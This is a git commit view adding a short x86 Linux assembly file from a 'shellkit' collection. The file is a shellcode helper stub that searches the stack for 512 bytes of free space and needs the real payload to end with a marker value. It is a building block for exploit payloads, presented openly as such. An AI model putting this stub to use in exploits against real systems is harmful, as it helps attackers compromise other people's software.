diff options
| author | Root THC | 2026-02-24 12:42:47 +0000 |
|---|---|---|
| committer | Root THC | 2026-02-24 12:42:47 +0000 |
| commit | c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch) | |
| tree | aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_linux/spset.s | |
| parent | 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff) | |
initial
Diffstat (limited to 'other/shellkit/x86_linux/spset.s')
| -rw-r--r-- | other/shellkit/x86_linux/spset.s | 36 |
1 files changed, 36 insertions, 0 deletions
diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_linux/spset.s | |||
| @@ -0,0 +1,36 @@ | |||
| 1 | /* x86 spset shellcode | ||
| 2 | * | ||
| 3 | * lorian / teso | ||
| 4 | */ | ||
| 5 | .globl cbegin | ||
| 6 | .globl _cbegin | ||
| 7 | .globl cend | ||
| 8 | .globl _cend | ||
| 9 | |||
| 10 | /* searches for 512 bytes "free" space on stack without destroying it | ||
| 11 | * like any kind of call would do... | ||
| 12 | * | ||
| 13 | * NOTE: your real shellcode must be terminated with | ||
| 14 | * \x78\x56\x34\x12 for this code to work... | ||
| 15 | */ | ||
| 16 | |||
| 17 | _cbegin: | ||
| 18 | cbegin: | ||
| 19 | |||
| 20 | movl $0x12345678, %eax | ||
| 21 | a: | ||
| 22 | cdq | ||
| 23 | movb $0x02, %dh | ||
| 24 | b: | ||
| 25 | popl %ebx | ||
| 26 | pushl %ebx | ||
| 27 | incl %esp | ||
| 28 | decl %edx | ||
| 29 | jz c | ||
| 30 | cmpl %eax, %ebx | ||
| 31 | je a | ||
| 32 | jmp b | ||
| 33 | c: | ||
| 34 | |||
| 35 | _cend: | ||
| 36 | cend: | ||